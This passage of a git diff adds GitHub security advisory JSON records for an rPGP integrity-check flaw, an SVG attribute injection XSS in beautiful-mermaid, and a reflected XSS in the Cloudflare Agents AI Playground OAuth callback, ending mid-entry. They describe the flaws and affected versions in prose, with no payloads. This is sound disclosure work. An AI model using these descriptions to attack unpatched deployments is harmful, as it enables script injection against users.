+ "details": "### Summary\nFor some messages, rPGP returned incorrectly decrypted data without signaling that integrity protection was invalid.\n\n### Details\nWhen decrypting SEIPD (Symmetrically Encrypted and Integrity Protected Data Packet), rPGP previously did not under all circumstances report the absence of valid integrity protection to callers of the library.\n\n### Impact\nWhile the resulting invalid decryption output is not attacker controlled, its contents may be a security concern if an attacker can gain access to it.\n\n### Attribution\nDiscovered internally in the course of rPGP development work.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "crates.io",
+ "name": "pgp"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.16.0-alpha.0"
+ },
+ {
+ "fixed": "0.19.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/rpgp/rpgp/security/advisories/GHSA-c7ph-f7jm-xv4w"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/rpgp/rpgp"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-354"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:55:20Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json b/advisories/github-reviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json
new file mode 100644
index 0000000000000..c260b4d1b9cbb
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json
@@ -0,0 +1,77 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cgmm-x5ww-q5cr",
+ "modified": "2026-02-13T21:04:19Z",
+ "published": "2026-02-13T18:31:25Z",
+ "aliases": [
+ "CVE-2026-26226"
+ ],
+ "summary": "beautiful-mermaid contains an SVG attribute injection issue that can lead to cross-site scripting (XSS)",
+ "details": "beautiful-mermaid versions prior to 0.1.3 contain an SVG attribute injection issue that can lead to cross-site scripting (XSS) when rendering attacker-controlled Mermaid diagrams. User-controlled values from Mermaid style and classDef directives are interpolated into SVG attribute values without proper escaping, allowing crafted input to break out of an attribute context and inject arbitrary SVG elements/attributes into the rendered output. When the generated SVG is embedded in a web page, this can result in script execution in the context of the embedding origin.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "beautiful-mermaid"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.1.3"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26226"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/lukilabs/beautiful-mermaid/pull/8"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/lukilabs/beautiful-mermaid/commit/68f3ab8c9658e7f4a3b749e06a6b96e4c3f55db1"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/lukilabs/beautiful-mermaid"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/lukilabs/beautiful-mermaid/releases/tag/v0.1.3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://neo.projectdiscovery.io/share/cec71dc7-a8eb-417e-b8b4-666644796c1e"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/beautiful-mermaid-svg-attribute-injection"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T21:04:19Z",
+ "nvd_published_at": "2026-02-13T17:16:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json b/advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json
new file mode 100644
index 0000000000000..3cc25c3b3a55b
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-cvhv-6xm6-c3v4/GHSA-cvhv-6xm6-c3v4.json
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cvhv-6xm6-c3v4",
+ "modified": "2026-02-13T20:04:56Z",
+ "published": "2026-02-13T03:31:23Z",
+ "aliases": [
+ "CVE-2026-1721"
+ ],
+ "summary": "Cloudflare Agents is Vulnerable to Reflected Cross-Site Scripting in the AI Playground's OAuth callback handler",
+ "details": "Summary\n\nA Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the AI Playground's OAuth callback handler. The `error_description` query parameter was directly interpolated into an HTML script tag without proper escaping, allowing attackers to execute arbitrary JavaScript in the context of the victim's session.\n\nRoot cause\n\nThe OAuth callback handler in `site/ai-playground/src/server.ts` directly interpolated the `authError` value, sourced from the `error_description` query parameter, into an inline `